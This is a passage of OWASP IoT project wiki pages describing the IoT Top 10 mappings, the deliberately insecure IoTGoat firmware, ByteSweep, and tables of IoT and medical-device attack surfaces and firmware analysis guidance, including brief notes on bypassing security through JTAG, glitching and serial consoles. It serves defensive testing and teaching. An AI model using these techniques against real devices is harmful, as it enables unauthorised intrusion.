* [[Top 10 2014-I10 Poor Physical Security|I10 Poor Physical Security]]<br />
<br />
== OWASP IoT Top 10 2018 Mapping Project ==<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoT Top 10 2018 Mapping Project ==<br />
<br />
The OWASP IoT Mapping Project is intended to provide a mapping of the OWASP IoT Top 10 2018 to industry publications and sister projects. The goal is to provide resources that enable practical uses for the OWASP IoT Top 10 . As with all Top 10 lists, they should be used as a first step and expanded upon according to the applicable IoT ecosystem. <br />
<br />
Mappings are structured with control categories, tests, or recommendations in the left column, descriptions in the middle column, and their mapping to the OWASP IoT Top 10 2018 list in the right column. Each mapping may not have a 1 to 1 relation; however, similar recommendations and/or controls are listed. For mappings that are not applicable to the IoT Top 10 2018 list, an "N/A" is provided as the mapping.<br />
<br />
An example mapping of the IoT Top 10 2014 is provided below. <br />
<br />
[[File:2014 2018Mapping.png|center|frameless|746x746px]]<br />
<br />
For additional mappings, please visit the following link: https://scriptingxss.gitbook.io/owasp-iot-top-10-mapping-project/<nowiki/>{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the IoT Top 10 Mapping Project? ==<br />
<br />
The OWASP IoT Mapping Project is intended to provide a mapping of the OWASP IoT Top 10 2018 to industry publications and sister projects. The goal is to provide resources that enable practical uses for the OWASP IoT Top 10 . As with all Top 10 lists, they should be used as a first step and expanded upon according to the applicable IoT ecosystem. <br />
<br />
Mappings include the following:<br />
* [https://scriptingxss.gitbook.io/owasp-iot-top-10-mapping-project/mappings/owasp-iot-top-10-2014 OWASP IoT Top 10 2014]<br />
* [https://scriptingxss.gitbook.io/owasp-iot-top-10-mapping-project/mappings/gsma-iot-security-assessment-checklist GSMA IoT Security Assessment Checklist]<br />
* [https://scriptingxss.gitbook.io/owasp-iot-top-10-mapping-project/mappings/code-of-practice Code of Practice (UK Government)]<br />
* [https://scriptingxss.gitbook.io/owasp-iot-top-10-mapping-project/mappings/enisa-baseline-security-recommendations-for-iot ENISA Baseline Security Recommendations for IoT]<br />
<br />
and more...<br />
<br />
== GitBook ==<br />
Mappings are hosted on GitBook using the following link https://scriptingxss.gitbook.io/owasp-iot-top-10-mapping-project/<br />
<br />
== Project Leaders ==<br />
<br />
* Aaron Guzman<br />
<br />
== Collaboration ==<br />
[https://owasp.slack.com The Slack Channel]<br />
<br />
|}<br />
<br />
= IoTGoat =<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoTGoat Project ==<br />
<br />
IoT Goat is a deliberately insecure firmware based on OpenWrt. The project’s goal is to teach users about the most common vulnerabilities typically found in IoT devices. The vulnerabilities will be based on the top 10 vulnerabilities as documented by OWASP: [[OWASP_Internet_of_Things_Project|https://www.owasp.org/index.php/OWASP_Internet_of_Things_Project]]. IoTGoat is expected to be released by December 2019. <br />
<br />
To get more information on getting started or how to contribute, visit the project's Github: https://github.com/scriptingxss/IoTGoat<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the IoTGoat Project? ==<br />
<br />
The IoTGoat Project is a deliberately insecure firmware based on OpenWrt. The project’s goal is to teach users about the most common vulnerabilities typically found in IoT devices. The vulnerabilities will be based on the IoT Top 10.<br />
<br />
== GitHub ==<br />
https://github.com/scriptingxss/IoTGoat<br />
<br />
== Project Leaders ==<br />
<br />
* Aaron Guzman<br />
* Fotios Chantzis<br />
* [[User:Calderpwn|Paulino Calderon]]<br />
<br />
== Related Projects ==<br />
<br />
* WebGoat<br />
* Serverless Goat<br />
* NodeGoat<br />
* RailsGoat<br />
<br />
== Collaboration ==<br />
[https://owasp.slack.com The Slack Channel]<br />
<br />
[https://groups.google.com/forum/#!forum/iotgoat IoTGoat Google Group]<br />
<br />
== Quick Download ==<br />
* [https://docs.google.com/presentation/d/1SJfabCBxvC3GWnmBCqisO5pyLzkB1-EVcR7s8baT0dE/edit?usp=sharing Project Kick-off Slides]<br />
* [https://strozfriedberg.webex.com/recordingservice/sites/strozfriedberg/recording/playback/5529b228ac514bed8cc050a9dee0f0df Project Kick-off Meeting]<br />
* [https://docs.google.com/spreadsheets/d/1KXX2K7ikkve6wmdfAVu-sZONgKEBuAkRij_paJUgX2w/edit?usp=sharing Project Task List]<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= ByteSweep =<br />
[[File:OWASP_Project_Header.jpg|link=]]<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== ByteSweep Project ==<br />
<br />
ByteSweep is a Free Software IoT security analysis platform. This platform will allow IoT device makers, large and small, to conduct fully automated security checks before they ship firmware. A Free Software IoT Firmware Security Analysis Platform<br />
<br />
ByteSweep Features:<br />
* Firmware extraction<br />
* File data enrichment<br />
* Key and password hash identification<br />
* Unsafe function use detection<br />
* 3rd party component identification<br />
* CVE correlation<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the ByteSweep Project? ==<br />
<br />
A Free Software IoT Firmware Security Analysis Platform.<br />
<br />
== GitLab ==<br />
https://gitlab.com/bytesweep/bytesweep<br />
<br />
== Project Leaders ==<br />
<br />
* Matt Brown<br />
<br />
== Collaboration ==<br />
[https://owasp.slack.com The Slack Channel]<br />
<br />
== Quick Download ==<br />
* https://gitlab.com/bytesweep/bytesweep/blob/master/INSTALL.md<br />
<br />
|}<br />
<br />
= IoT Attack Surface Areas =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoT Attack Surface Areas Project ==<br />
<br />
The OWASP IoT Attack Surface Areas (DRAFT) are as follows:<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Attack Surface<br />
! Vulnerability<br />
|- <br />
| '''Ecosystem (general)'''<br />
|<br />
* Interoperability standards<br />
* Data governance<br />
* System wide failure<br />
* Individual stakeholder risks<br />
* Implicit trust between components<br />
* Enrollment security<br />
* Decommissioning system<br />
* Lost access procedures<br />
|- <br />
| '''Device Memory'''<br />
|<br />
* Sensitive data<br />
** Cleartext usernames<br />
** Cleartext passwords<br />
** Third-party credentials<br />
** Encryption keys<br />
|- <br />
| '''Device Physical Interfaces'''<br />
|<br />
* Firmware extraction<br />
* User CLI<br />
* Admin CLI<br />
* Privilege escalation<br />
* Reset to insecure state<br />
* Removal of storage media<br />
* Tamper resistance<br />
* Debug port<br />
** UART (Serial)<br />
** JTAG / SWD<br />
* Device ID/Serial number exposure<br />
|-<br />
| '''Device Web Interface'''<br />
|<br />
* Standard set of web application vulnerabilities, see:<br />
** [[:Category:OWASP Top Ten Project|OWASP Web Top 10]]<br />
** [[:Category:OWASP Application Security Verification Standard Project|OWASP ASVS]]<br />
** [[:Category:OWASP Testing Project|OWASP Testing guide]]<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Device Firmware'''<br />
|<br />
* Sensitive data exposure ([[Top 10 2013-A6-Sensitive Data Exposure|See OWASP Top 10 - A6 Sensitive data exposure]]):<br />
** Backdoor accounts<br />
** Hardcoded credentials<br />
** Encryption keys<br />
** Encryption (Symmetric, Asymmetric)<br />
** Sensitive information<br />
** Sensitive URL disclosure<br />
* Firmware version display and/or last update date<br />
* Vulnerable services (web, ssh, tftp, etc.)<br />
** Verify for old sw versions and possible attacks (Heartbleed, Shellshock, old PHP versions etc)<br />
* Security related function API exposure<br />
* Firmware downgrade possibility<br />
|- <br />
| '''Device Network Services'''<br />
|<br />
* Information disclosure<br />
* User CLI<br />
* Administrative CLI<br />
* Injection<br />
* Denial of Service<br />
* Unencrypted Services<br />
* Poorly implemented encryption<br />
* Test/Development Services<br />
* Buffer Overflow<br />
* UPnP<br />
* Vulnerable UDP Services<br />
* DoS<br />
* Device Firmware OTA update block<br />
* Firmware loaded over insecure channel (no TLS)<br />
* Replay attack<br />
* Lack of payload verification<br />
* Lack of message integrity check<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Administrative Interface'''<br />
|<br />
* Standard set of web application vulnerabilities, see:<br />
** [[:Category:OWASP Top Ten Project|OWASP Web Top 10]]<br />
** [[:Category:OWASP Application Security Verification Standard Project|OWASP ASVS]]<br />
** [[:Category:OWASP Testing Project|OWASP Testing guide]]<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Security/encryption options<br />
* Logging options<br />
* Two-factor authentication<br />
* Check for insecure direct object references<br />
* Inability to wipe device<br />
|- <br />
| '''Local Data Storage'''<br />
|<br />
* Unencrypted data<br />
* Data encrypted with discovered keys<br />
* Lack of data integrity checks<br />
* Use of static same enc/dec key<br />
|- <br />
| '''Cloud Web Interface'''<br />
|<br />
<br />
* Standard set of web application vulnerabilities, see:<br />
** [[:Category:OWASP Top Ten Project|OWASP Web Top 10]]<br />
** [[:Category:OWASP Application Security Verification Standard Project|OWASP ASVS]]<br />
** [[:Category:OWASP Testing Project|OWASP Testing guide]]<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Transport encryption<br />
* Two-factor authentication<br />
|- <br />
| '''Third-party Backend APIs'''<br />
|<br />
* Unencrypted PII sent<br />
* Encrypted PII sent<br />
* Device information leaked<br />
* Location leaked<br />
|- <br />
| '''Update Mechanism'''<br />
|<br />
* Update sent without encryption<br />
* Updates not signed<br />
* Update location writable<br />
* Update verification<br />
* Update authentication<br />
* Malicious update<br />
* Missing update mechanism<br />
* No manual update mechanism<br />
|- <br />
| '''Mobile Application'''<br />
|<br />
* Implicitly trusted by device or cloud<br />
* Username enumeration<br />
* Account lockout<br />
* Known default credentials<br />
* Weak passwords<br />
* Insecure data storage<br />
* Transport encryption<br />
* Insecure password recovery mechanism<br />
* Two-factor authentication<br />
|- <br />
| '''Vendor Backend APIs'''<br />
|<br />
* Inherent trust of cloud or mobile application<br />
* Weak authentication<br />
* Weak access controls<br />
* Injection attacks<br />
* Hidden services<br />
|- <br />
| '''Ecosystem Communication'''<br />
|<br />
* Health checks<br />
* Heartbeats<br />
* Ecosystem commands<br />
* Deprovisioning<br />
* Pushing updates<br />
|- <br />
| '''Network Traffic'''<br />
|<br />
* LAN<br />
* LAN to Internet<br />
* Short range<br />
* Non-standard<br />
* Wireless (WiFi, Z-wave, XBee, Zigbee, Bluetooth, LoRA)<br />
* Protocol fuzzing<br />
|- <br />
| '''Authentication/Authorization'''<br />
|<br />
* Authentication/Authorization related values (session key, token, cookie, etc.) disclosure<br />
* Reusing of session key, token, etc.<br />
* Device to device authentication<br />
* Device to mobile Application authentication<br />
* Device to cloud system authentication<br />
* Mobile application to cloud system authentication<br />
* Web application to cloud system authentication<br />
* Lack of dynamic authentication<br />
|-<br />
| '''Privacy'''<br />
|<br />
* User data disclosure<br />
* User/device location disclosure<br />
* Differential privacy<br />
|-<br />
| '''Hardware (Sensors)'''<br />
|<br />
* Sensing Environment Manipulation<br />
* Tampering (Physically)<br />
* Damage (Physicall)<br />
<br />
|-<br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the IoT Attack Surface Areas Project? ==<br />
<br />
The IoT Attack Surface Areas Project provides a list of attack surfaces that should be understood by manufacturers, developers, security researchers, and those looking to deploy or implement IoT technologies within their organizations.<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
* Craig Smith<br />
<br />
== Related Projects ==<br />
<br />
* [https://www.owasp.org/index.php/OWASP_Mobile_Security_Project The OWASP Mobile Top 10 Project]<br />
* [https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project The OWASP Web Top 10 Project]<br />
<br />
== Collaboration ==<br />
[https://owasp.slack.com The Slack Channel]<br />
<br />
== Quick Download ==<br />
* Coming Soon<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= IoT Vulnerabilities =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoT Vulnerabilities Project ==<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Vulnerability<br />
! Attack Surface<br />
! Summary<br />
|-<br />
| '''Username Enumeration'''<br />
|<br />
* Administrative Interface<br />
* Device Web Interface<br />
* Cloud Interface<br />
* Mobile Application<br />
|<br />
* Ability to collect a set of valid usernames by interacting with the authentication mechanism<br />
|-<br />
| '''Weak Passwords'''<br />
|<br />
* Administrative Interface<br />
* Device Web Interface<br />
* Cloud Interface<br />
* Mobile Application<br />
|<br />
* Ability to set account passwords to '1234' or '123456' for example.<br />
* Usage of pre-programmed default passwords<br />
|-<br />
| '''Account Lockout'''<br />
|<br />
* Administrative Interface<br />
* Device Web Interface<br />
* Cloud Interface<br />
* Mobile Application<br />
|<br />
* Ability to continue sending authentication attempts after 3 - 5 failed login attempts<br />
|-<br />
| '''Unencrypted Services'''<br />
|<br />
* Device Network Services<br />
|<br />
* Network services are not properly encrypted to prevent eavesdropping or tampering by attackers<br />
|-<br />
| '''Two-factor Authentication'''<br />
|<br />
* Administrative Interface<br />
* Cloud Web Interface<br />
* Mobile Application<br />
|<br />
* Lack of two-factor authentication mechanisms such as a security token or fingerprint scanner<br />
|-<br />
| '''Poorly Implemented Encryption'''<br />
|<br />
* Device Network Services<br />
|<br />
* Encryption is implemented however it is improperly configured or is not being properly updated, e.g. using SSL v2 <br />
|-<br />
| '''Update Sent Without Encryption'''<br />
|<br />
* Update Mechanism<br />
|<br />
* Updates are transmitted over the network without using TLS or encrypting the update file itself<br />
|-<br />
| '''Update Location Writable'''<br />
|<br />
* Update Mechanism<br />
|<br />
* Storage location for update files is world writable potentially allowing firmware to be modified and distributed to all users<br />
|-<br />
| '''Denial of Service'''<br />
|<br />
* Device Network Services<br />
|<br />
* Service can be attacked in a way that denies service to that service or the entire device<br />
|-<br />
| '''Removal of Storage Media'''<br />
|<br />
* Device Physical Interfaces<br />
|<br />
* Ability to physically remove the storage media from the device<br />
|-<br />
| '''No Manual Update Mechanism'''<br />
|<br />
* Update Mechanism<br />
|<br />
* No ability to manually force an update check for the device<br />
|-<br />
| '''Missing Update Mechanism'''<br />
|<br />
* Update Mechanism<br />
|<br />
* No ability to update device<br />
|-<br />
| '''Firmware Version Display and/or Last Update Date'''<br />
|<br />
* Device Firmware<br />
|<br />
* Current firmware version is not displayed and/or the last update date is not displayed<br />
|-<br />
| '''Firmware and storage extraction'''<br />
|<br />
* JTAG / SWD interface<br />
* [https://www.flashrom.org/Flashrom In-Situ dumping]<br />
* Intercepting a OTA update<br />
* Downloading from the manufacturers web page<br />
* [https://www.exploitee.rs/index.php/Exploitee.rs_Low_Voltage_e-MMC_Adapter eMMC tapping]<br />
* Unsoldering the SPI Flash / eMMC chip and reading it in a adapter<br />
|<br />
* Firmware contains a lot of useful information, like source code and binaries of running services, pre-set passwords, ssh keys etc. <br />
|-<br />
| '''Manipulating the code execution flow of the device'''<br />
|<br />
* JTAG / SWD interface<br />
* [https://wiki.newae.com/Main_Page Side channel attacks like glitching]<br />
|<br />
* With the help of a JTAG adapter and gdb we can modify the execution of firmware in the device and bypass almost all software based security controls.<br />
* Side channel attacks can also modify the execution flow or can be used to leak interesting information from the device<br />
|-<br />
| '''Obtaining console access'''<br />
|<br />
* Serial interfaces (SPI / UART)<br />
|<br />
* By connecting to a serial interface, we will obtain full console access to a device<br />
* Usually security measures include custom bootloaders that prevent the attacker from entering single user mode, but that can also be bypassed.<br />
|-<br />
| '''Insecure 3rd party components'''<br />
|<br />
* Software<br />
|<br />
* Out of date versions of busybox, openssl, ssh, web servers, etc.<br />
|-<br />
<br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the IoT Vulnerabilities Project? ==<br />
<br />
The IoT Vulnerabilities Project provides:<br />
<br />
* Information on the top IoT vulnerabilities<br />
* The attack surface associated with the vulnerability<br />
* A summary of the vulnerability<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
* Craig Smith<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Resources ==<br />
* [https://www.owasp.org/index.php/Top_IoT_Vulnerabilities Top 10 IoT Vulnerabilities from 2014]<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= Medical Devices =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== Medical Device Testing ==<br />
<br />
The Medical Device Testing project is intended to provide some basic attack surface considerations that should be evaluated before shipping Medical Device equipment.<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Attack Surface<br />
! Vulnerability<br />
|- <br />
| '''Ecosystem (general)'''<br />
|<br />
* Interoperability standards<br />
* Data governance<br />
* System wide failure<br />
* Individual stakeholder risks<br />
* Implicit trust between components<br />
* Enrollment security<br />
* Decommissioning system<br />
* Lost access procedures<br />
|- <br />
| '''HL7'''<br />
|<br />
* XML Parsing<br />
** XSS<br />
* Information Disclosure<br />
|- <br />
| '''Device Memory'''<br />
|<br />
* Sensitive data<br />
** Cleartext usernames<br />
** Cleartext passwords<br />
** Third-party credentials<br />
** Encryption keys<br />
|- <br />
| '''Device Physical Interfaces'''<br />
|<br />
* Firmware extraction<br />
* User CLI<br />
* Admin CLI<br />
* Privilege escalation<br />
* Reset to insecure state<br />
* Removal of storage media<br />
* Tamper resistance<br />
* Debug port<br />
* Device ID/Serial number exposure<br />
|-<br />
| '''Device Web Interface'''<br />
|<br />
* Standard set of web vulnerabilities:<br />
** SQL injection<br />
** Cross-site scripting<br />
** Cross-site Request Forgery<br />
** Username enumeration<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Device Firmware'''<br />
|<br />
* Sensitive data exposure:<br />
** Backdoor accounts<br />
** Hardcoded credentials<br />
** Encryption keys<br />
** Encryption (Symmetric, Asymmetric)<br />
** Sensitive information<br />
** Sensitive URL disclosure<br />
* Firmware version display and/or last update date<br />
* Vulnerable services (web, ssh, tftp, etc.)<br />
* Security related function API exposure<br />
* Firmware downgrade<br />
|- <br />
| '''Device Network Services'''<br />
|<br />
* Information disclosure<br />
* User CLI<br />
* Administrative CLI<br />
* Injection<br />
* Denial of Service<br />
* Unencrypted Services<br />
* Poorly implemented encryption<br />
* Test/Development Services<br />
* Buffer Overflow<br />
* UPnP<br />
* Vulnerable UDP Services<br />
* DoS<br />
* Device Firmware OTA update block<br />
* Replay attack<br />
* Lack of payload verification<br />
* Lack of message integrity check<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Administrative Interface'''<br />
|<br />
* Standard web vulnerabilities:<br />
** SQL injection<br />
** Cross-site scripting<br />
** Cross-site Request Forgery<br />
** Username enumeration<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Security/encryption options<br />
* Logging options<br />
* Two-factor authentication<br />
* Inability to wipe device<br />
|- <br />
| '''Local Data Storage'''<br />
|<br />
* Unencrypted data<br />
* Data encrypted with discovered keys<br />
* Lack of data integrity checks<br />
* Use of static same enc/dec key<br />
|- <br />
| '''Cloud Web Interface'''<br />
|<br />
* Standard set of web vulnerabilities:<br />
** SQL injection<br />
** Cross-site scripting<br />
** Cross-site Request Forgery<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Transport encryption<br />
* Two-factor authentication<br />
|- <br />
| '''Third-party Backend APIs'''<br />
|<br />
* Unencrypted PII sent<br />
* Encrypted PII sent<br />
* Device information leaked<br />
* Location leaked<br />
|- <br />
| '''Update Mechanism'''<br />
|<br />
* Update sent without encryption<br />
* Updates not signed<br />
* Update location writable<br />
* Update verification<br />
* Update authentication<br />
* Malicious update<br />
* Missing update mechanism<br />
* No manual update mechanism<br />
|- <br />
| '''Mobile Application'''<br />
|<br />
* Implicitly trusted by device or cloud<br />
* Username enumeration<br />
* Account lockout<br />
* Known default credentials<br />
* Weak passwords<br />
* Insecure data storage<br />
* Transport encryption<br />
* Insecure password recovery mechanism<br />
* Two-factor authentication<br />
|- <br />
| '''Vendor Backend APIs'''<br />
|<br />
* Inherent trust of cloud or mobile application<br />
* Weak authentication<br />
* Weak access controls<br />
* Injection attacks<br />
* Hidden services<br />
|- <br />
| '''Ecosystem Communication'''<br />
|<br />
* Health checks<br />
* Heartbeats<br />
* Ecosystem commands<br />
* Deprovisioning<br />
* Pushing updates<br />
|- <br />
| '''Network Traffic'''<br />
|<br />
* LAN<br />
* LAN to Internet<br />
* Short range<br />
* Non-standard<br />
* Wireless (WiFi, Z-wave, XBee, Zigbee, Bluetooth, LoRA)<br />
* Protocol fuzzing<br />
|- <br />
| '''Authentication/Authorization'''<br />
|<br />
* Authentication/Authorization related values (session key, token, cookie, etc.) disclosure<br />
* Reusing of session key, token, etc.<br />
* Device to device authentication<br />
* Device to mobile Application authentication<br />
* Device to cloud system authentication<br />
* Mobile application to cloud system authentication<br />
* Web application to cloud system authentication<br />
* Lack of dynamic authentication<br />
|-<br />
| '''Data Flow'''<br />
|<br />
* What data is being captured?<br />
* How does it move within the ecosystem?<br />
* How is it protected in transit?<br />
* How is it protected at rest?<br />
* Who is that data shared with?<br />
|-<br />
| '''Hardware (Sensors)'''<br />
|<br />
* Sensing Environment Manipulation<br />
* Tampering (Physically)<br />
* Damaging (Physically)<br />
* Failure state analysis<br />
|-<br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the Medical Attack Surfaces project? ==<br />
<br />
The Medical Attack Surfaces project provides:<br />
<br />
* A simple way for testers, manufacturers, developers, and users to get an understanding of the complexity of a modern medical environment<br />
* Allows people to visualize the numerous attack surfaces that need to be defended within medical equipment ecosystems<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Resources ==<br />
* [https://www.owasp.org/index.php/IoT_Firmware_Analysis IoT Firmware Analysis Primer]<br />
* [https://otalliance.org/initiatives/internet-things Online Trust Alliance - Internet of Things]<br />
* [https://people.debian.org/~aurel32/qemu/ Pre-compiled QEMU images]<br />
* [https://code.google.com/archive/p/firmware-mod-kit/ Firmware Modification Kit]<br />
* [https://craigsmith.net/episode-11-1-firmware-extraction/ Short Firmware Extraction Video]<br />
* [https://craigsmith.net/episode-12-1-firmware-emulation-with-qemu/ Firmware Emulation with QEMU]<br />
* [https://craigsmith.net/episode-18-1-file-extraction-from-network-capture/ File Extraction from Network Capture]<br />
<br />
== News and Events ==<br />
* Daniel Miessler presented on using Adaptive Testing Methodologies to evaluate the security of medical devices at RSA 2017.<br />
<br />
|}<br />
<br />
= Firmware Analysis =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== Firmware Analysis Project ==<br />
<br />
The Firmware Analysis Project is intended to provide security testing guidance for the IoT Attack Surface "Device Firmware":<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Section<br />
! <br />
|- <br />
|<br />
Device Firmware Vulnerabilities<br />
|<br />
* Out-of-date core components<br />
* Unsupported core components<br />
* Expired and/or self-signed certificates<br />
* Same certificate used on multiple devices<br />
* Admin web interface concerns<br />
* Hardcoded or easy to guess credentials<br />
* Sensitive information disclosure<br />
* Sensitive URL disclosure<br />
* Encryption key exposure<br />
* Backdoor accounts<br />
* Vulnerable services (web, ssh, tftp, etc.)<br />
|-<br />
|<br />
Manufacturer Recommendations<br />
|<br />
* Ensure that supported and up-to-date software is used by developers<br />
* Ensure that robust update mechanisms are in place for devices<br />
* Ensure that certificates are not duplicated across devices and product lines.<br />
* Ensure supported and up-to-date software is used by developers<br />
* Develop a mechanism to ensure a new certificate is installed when old ones expire<br />
* Disable deprecated SSL versions<br />
* Ensure developers do not code in easy to guess or common admin passwords<br />
* Ensure services such as SSH have a secure password created<br />
* Develop a mechanism that requires the user to create a secure admin password during initial device setup<br />
* Ensure developers do not hard code passwords or hashes<br />
* Have source code reviewed by a third party before releasing device to production<br />
* Ensure industry standard encryption or strong hashing is used<br />
|-<br />
|<br />
Device Firmware Guidance and Instruction<br />
|<br />
* Firmware file analysis<br />
* Firmware extraction<br />
* Dynamic binary analysis<br />
* Static binary analysis<br />
* Static code analysis<br />
* Firmware emulation<br />
* File system analysis<br />
|-<br />
|<br />
Device Firmware Tools<br />
|<br />
* [https://github.com/craigz28/firmwalker Firmwalker] <br />
* [https://code.google.com/archive/p/firmware-mod-kit/ Firmware Modification Kit]<br />
* [https://github.com/angr/angr Angr binary analysis framework]<br />
* [http://binwalk.org/ Binwalk firmware analysis tool]<br />
* [http://www.binaryanalysis.org/en/home Binary Analysis Tool]<br />
* [https://github.com/firmadyne/firmadyne Firmadyne]<br />
* Firmware Analysis Comparison Toolkit<br />
* [https://gitlab.com/bytesweep/bytesweep ByteSweep]<br />
|-<br />
|<br />
Vulnerable Firmware<br />
|<br />
* [https://github.com/praetorian-inc/DVRF Damn Vulnerable Router Firmware]<br />
* [https://github.com/scriptingxss/IoTGoat OWASP IoTGoat]<br />
|-<br />
|<br />
|}{{Social Media Links}} <br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the Firmware Analysis Project? ==<br />
<br />
The Firmware Analysis Project provides:<br />
<br />
* Security testing guidance for vulnerabilities in the "Device Firmware" attack surface<br />
* Steps for extracting file systems from various firmware files<br />
* Guidance on searching a file systems for sensitive of interesting data<br />
* Information on static analysis of firmware contents<br />
* Information on dynamic analysis of emulated services (e.g. web admin interface)<br />
* Testing tool links<br />
* A site for pulling together existing information on firmware analysis<br />
<br />
== Project Leaders ==<br />
<br />
* Craig Smith<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
* [https://www.owasp.org/index.php/OWASP_Embedded_Application_Security OWASP Embedded Application Security Project]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Resources ==<br />
* [https://www.owasp.org/index.php/IoT_Firmware_Analysis IoT Firmware Analysis Primer]<br />
* [https://otalliance.org/initiatives/internet-things Online Trust Alliance - Internet of Things]<br />
* [https://people.debian.org/~aurel32/qemu/ Pre-compiled QEMU images]<br />
* [https://code.google.com/archive/p/firmware-mod-kit/ Firmware Modification Kit]<br />
* [https://craigsmith.net/episode-11-1-firmware-extraction/ Short Firmware Extraction Video]<br />
* [https://craigsmith.net/episode-12-1-firmware-emulation-with-qemu/ Firmware Emulation with QEMU]<br />
* [https://craigsmith.net/episode-18-1-file-extraction-from-network-capture/ File Extraction from Network Capture]<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= Firmware Security Testing Methodology =<br />
[[File:OWASP_Project_Header.jpg|link=]]<br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== Firmware Security Testing Methodology ==<br />
<br />
